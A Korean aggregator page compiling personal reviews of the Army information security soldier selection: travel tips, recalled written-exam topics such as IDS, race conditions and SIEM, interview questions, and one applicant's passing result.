시험이 끝나고 번호표 대로 시험지를 제출하고 3층으로 올라가서 번호대로 앉아서 면접을 기다려야 한다. 면접은 기술면접과 인성면접 총 2번의 면접을 봐야하며, 면접은 1대1방식으로 이루어졌다. 그리고 기술면접과 인성면접 순서가 있는게 아니라서 인성면접 보고나서 기술면접 보기도 하고, 기술면접을 먼저 보고나서 인성면접을 보기도 하는데, 필자는 후자였다.

기술면접은 젊은 남자분께서 면접을 담당하셨다. 원래는 면접이나 테스트가 있을때 극도로 긴장을 하는 성격인데, 면접관께서 편하게 하신거 같아서 평소보다는 덜 긴장을 하고 면접을 보았다.

기술면접 질문은 밑에 있는정도로 질문이 나왔다.

1. 정보보호병이 무슨일을 하는지

ㄴ정보보호병에 대해 잘못 알고 오는 사람들이 꽤 많다고 하셨다.

2. 자신이 주로 공부했던 분야

ㄴ(꼬리질문)공부했던 분야중에서 하나 설명

3. IDS/IPS의 차이점

ㄴ긴장이 덜 되었어도 역시 긴장한 탓에 설명에 실수가 조금 있었다.

4. 군단급 보직중 사단급에서 침투가 의심되는데, 사단급에서는 침투를 발견하지 못했고 문제 없어 보이는데, 발견한 로그를 놔두면 문제가 생길수도 있으니 지워달라고 했을때 어떻게 할것인가?(정확하지는 않음)

ㄴ적절하게 대답했는지, 면접관께서 좋은 답변이라고 해주셨다.

5. 마지막으로 더 하고 싶은말

ㄴ덕분에 덜 긴장하고 면접에 임할 수 있어서 감사하다고 말했는데, 면접관께서는 그래도 긴장돼 보인다고 하셨다…

인성면접은 젊은 여자분께서 면접을 담당하셨다. 면접관께서 일반적이게 대화하는것처럼 정말 편하게 해주셔서 이때는 정말 편하게 질문에 대해 답변을 했다. 하지만 너무 편해서 그런지 말투나 언행에 있어서 원래의 성격대로 조금 나온것이 있다보니.. 면접이 끝나고 나서 많이 후회했다.

1. 가족 관계

ㄴ가족 관계에서 사소한 질문이 있었다.

2. 성격 관련

ㄴ여기 역시 사소한 질문들이 있었다.

3. 가고싶은 회사

ㄴ보안 관련 유명한 기업쪽으로 이름을 댔다.

4. 6.25전쟁 발발 원인

ㄴ예상외의 질문이라서 좀 당황하고 제대로 답변하지 못했다. 한국사에 대해 쥐약이라서 대충 알고 있는 정도로만 대답해서 그런지, 조금은 아쉬웠다.

5. 현재의 주 적은 누구라고 생각하는가?

ㄴ어느정도 준비했었던 질문이라서, 적절하게 대답한 것 같다.

6. 보직중 자신이 분대장이고 같이 근무하는 조에서 누군가가 휴가를 나갔을때 그 빈자리의 일을 어떻게 할 것인가?

ㄴ머리속에 있는 생각대로 어느정도 답변을 한 것 같다.

걱정했던것에 비해서는 그래도 어느정도 쉬운 편이여서 다행이다 라고 생각했다. 하지만 잔실수도 꽤 많았고 처음 시험에서도 조금 아리송한 문제들이 2~3개 있다보니 결과는 지켜봐야 알것 같다.

2021.05.27 육군 정보보호병 2차(면접, 필기) 결과

결과

우선 결과를 말씀드리면, 합격했습니다….

다른 블로그도 보면 결과 발표일 아침 10시 쯤에 합격한 사람에게는 카톡으로 알림이 오는 것 같습니다.

후기

저는 1차 때, 80명 중 51등으로 합격하여 사실 떨어지겠지라는 생각으로 면접과 필기를 임했었습니다. 그래도 최선을 다해야겠다는 생각에 며칠 전부터 정보보안기사 문제집을 사서 읽고 풀었습니다. (물론 다 하지는 못했습니다 ㅎㅎ) 그래서 필기에 막 도움이 되지는 않았지만, 그래도 아무것도 안하는 것보다는 좋은 것 같습니다.

필기를 본지 꽤 되어서 기억은 안나지만 최대한 기억을 되살려서 문제와 상황을 설명해보도록 하겠습니다.

저는 서울역에 가서 대전역으로 가는 기차를 탔습니다. KTX와 일반 열차가 있는데 시간 차이가 꽤 나서 잘 선택하시길 바랍니다. 그리고, 전날에 하지 마시고 제~~발 며칠 전부터 하시길 추천드립니다. 전날에 하려고 하면 아예 자리가 없는 경우가 많아서…

열차를 타고 대전역에서 내린 뒤, 다시 전철을 타고 약 10분이면 서대전네거리 역에 도착합니다. 그리고 좀 걷다보면 대문짝만 하게 대전 병무청이라고 써있는 표지판을 볼 수 있고 오르막길을 따라 올라가다 보면 왼쪽에는 병무청 건물과 오른쪽에 면접 건물이 있는 것을 확인할 수 있습니다.

왼쪽은 병무청, 오른쪽이 면접 건물

저는 한 10분 전에 도착해서 후회를 많이 한 케이스입니다. 다른 블로그에서는 제발 최소 30분은 일찍가야 좋다고 하셨지만, 직접 왜 좋은지 몸소 체험하게 되었습니다.

도착하면, 번호표를 뽑는데 제가 대략 72번 쯤이었습니다.(거이 막판에 왔다는 거죠 ㅎㅎ) 시험 시작 시간쯤이 되면 앞 번호 40명은 우선 2층에서 시험을 치루고 남은 40명은 3층에서 기다리게 됩니다. 여기서부터 일찍가야 하는 이유가 나옵니다. 일찍가야 일찍 시험보고 일찍 면접을 본 뒤 집에 가기 때문입니다. 하지만 저는 늦게 시험보고 늦게 면접보고 집에 가는 바람에 아주 고생했습니다.

앞 인원 시험이 끝나고 저도 시험을 치루게 되었습니다. 기억은 가물가물 하지만, 문항들을 알려드리면

1. 다음 중 전자서명에 사용되는 알고리즘이 아닌 것은?

-> 문항이 기억이 안나는데 특출난 답 하나가 있었다.

2. 데이터베이스 보안을 위해 해야할 행동이 아닌 것은?

-> 로컬 접속을 막는다.

3. 다음 상황에 알맞은 단어는?

-> Race Condition이 일어나는 상황이 설명되어있다.( 다른 답을 봐도, 예시를 봐도 Race Condition 이었다.)

4. 다음 빈칸에 들어갈 알맞은 번호는?

-> 4Way handshaking 과정에서 Seq와 FIN 등이 비어있고 알맞은 값이 있는 문항을 골라야 한다. EX) (ㄱ)1555 – (ㄴ)4331

5. IDS가 처리하는 과정이 올바르게 나열된 것은?

-> 4개로 나누어진 IDS 처리 과정이 나열되어 있다.

6. SIEM에서 사용하는 프로그램이 아닌 것은?

-> beStorm이 답

7. 다음 예시에 대항하는 것은?

-> 제 3자 기반 암호 방식에 대항하는 것을 고르는 거였는데 잘 기억이 안난다. 문항으로는 RSA, 리피 헬만 알고리즘 등이 있었다.

8. 다음 중 웹로그에 있는 것들만 있는 것은?

-> 사용자 ID, 접속 IP, 접속 날짜 등 6가지가 있었고 ㄱ, ㄴ, ㄷ 혹은 ㄱ, ㄴ 이렇게 있는 문항 중 고르는 문제였다.

9. 리눅스에서 파일을 이름이 아닌 특정 번호로 관리하는데 해당 번호를 가진 파일(?) 시스템은?

-> I-node를 설명하는 예시가 적혀있고 리눅스 관련 용어들 나머지 3가지가 있었다.

10. BYOD였나 BYD 였나 (Bring Your device OR Own Device)에서 여러 사례 중 다음 예시에 알맞은 것은?

-> 모바일에서 여러 OS를 사용하는 어쩌고 그냥 몰라도 모바일 관련이 답이여서 해당 답을 찍었다.

(문항 순서가 좀 섞였습니다.)

이렇게 있었습니다. 나중에 채점을 해봤더니 대략 최소 5개 ~ 7개 정도 맞았던 것 같습니다. 시험을 치루고 난 뒤 3층으로 이동하여 면접을 기다렸습니다. 면접도 번호표 순서대로 봤고 첫 번째 면접과 두 번째 면접으로 나뉘어 면접을 치루었습니다. 첫 번째 면접을 본 뒤 의자에 앉아 대기하다가 두 번째 면접을 보는 식이었습니다.

첫 번째 면접에서는

정보보호병은 어떤 업무를 하는지 아는가?

관제 업무를 진행하면 오랫동안 앉아있어야 하는데 괜찮은가?

CTF나 그런 활동들을 해본 것이 있나?

해봤다면 수상을 해본 적이 있는가?

하고 있는 프로젝트나 공부가 있는가?

왜 정보보호병을 선택하였는가?

요정도 질문을 했던 것 같습니다. 대체적으로 전공 지식에 대해 질문하는 것 같았습니다. 여기서 중요한 점은 저는 정보보호병 서류를 제출할 때 특기사항을 제출하지 않았습니다. 그래서 제가 분명 2차에서 떨어질 것이라고 생각했던 이유 중 하나였습니다. 하지만, 예상과는 다르게 무난하게 면접을 진행하였습니다.

두 번째 면접에서는

롤 모델이 있는가? 있다면 이유가 무엇인가?

군대가 왜 있어야 한다고 생각하는가?

최근에 남을 위해 봉사한 경험이 있는가?

이게 끝입니다….. 저는 이 두 번째 면접에서 “아… 서류 제출 안해서 망했다”라고 생각했습니다. 두 번째 면접에서는 주로 전공 외의 문항을 채점하기 위해 하는 것 같이 질문을 하셨는데, 솔직히 그냥 점수를 주신 것 같다는 생각도 들었습니다.

엔딩

51등 -> 22등이라는 엄청난 결과가 나오게 되었습니다. 여러 악재가 겹치기도 하고 51등이면 엄청 불안한 등수 이기에 결과가 나올 때까지 매일 불안해 했지만, 결국 끝을 봐야 아는 것이라고 29명을 제치고 22등을 하게 되었습니다. 여러분도 정보보호병에 도전하실 때 1차 결과가 안좋게 나와도 실망하여 면접과 필기를 포기하지 마시고 저처럼 최악에 상황에서도 최고의 결과를 끌어내시길 바랍니다.

키워드에 대한 정보 정보 보호 병 후기

다음은 Bing에서 정보 보호 병 후기 주제에 대한 검색 결과입니다. 필요한 경우 더 읽을 수 있습니다.

이 기사는 인터넷의 다양한 출처에서 편집되었습니다. 이 기사가 유용했기를 바랍니다. 이 기사가 유용하다고 생각되면 공유하십시오. 매우 감사합니다!

사람들이 주제에 대해 자주 검색하는 키워드 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병)

  • 정보보호병
  • 정보보호기술병
  • 군대
  • 소프트웨어병
  • 소프트웨어개발병
  • 컴퓨터공학
  • 컴공
  • 지원
  • 방법
  • 병무청
  • 국방부
  • 사이버전사
  • 정보보호

컴공은 #꼭 #군대를 #여기로 #가세요… #(Feat. #정보보호병 #/ #소프트웨어개발병)


YouTube에서 정보 보호 병 후기 주제의 다른 동영상 보기

주제에 대한 기사를 시청해 주셔서 감사합니다 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병) | 정보 보호 병 후기, 이 기사가 유용하다고 생각되면 공유하십시오, 매우 감사합니다.

See also  믿음 다하여 그 위에 서 리라 | 마커스워십 - 믿음으로 서리라 (심종호 인도) 159 개의 정답

Leave a Comment